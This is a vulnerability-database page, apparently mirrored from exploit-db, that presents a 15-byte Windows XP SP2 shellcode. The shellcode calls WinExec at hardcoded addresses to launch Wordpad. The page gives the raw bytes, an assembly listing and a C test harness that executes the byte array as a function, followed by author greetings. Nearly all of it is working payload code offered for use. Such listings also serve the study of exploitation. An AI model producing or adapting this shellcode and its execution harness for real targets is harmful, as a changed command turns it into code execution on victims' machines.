Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057072 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43763
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
+-------------------------------------------------+

| Windows XP Pro Sp2 English "Wordpad" Shellcode. |

+-------------------------------------------------+


Size  : 15 Bytes.
Author: Aodrulez. 
Email : f3arm3d3ar@gmail.com


Shellcode = "\x6A\x05\x68\x97\x4C\x80\x7C\xB8"
            "\x4D\x11\x86\x7C\xFF\xD0\xCC";


+-----------+

| Asm Code: |

+-----------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

start:
      push 5
	push 7c804c97h    ;addr of "write" string in mem
	mov eax,7c86114dh ;addr of "WinExec" Function.
	call eax
	int 3h
end start

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


+-----------------+

| Shellcodetest.c |

+-----------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

char code[] = "\x6A\x05\x68\x97\x4C"
              "\x80\x7C\xB8\x4D\x11"
              "\x86\x7C\xFF\xD0\xCC";


int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+-------------------+

| Greetz Fly Out To |

+-------------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1] Amforked()	 : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.isacm.org.in

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~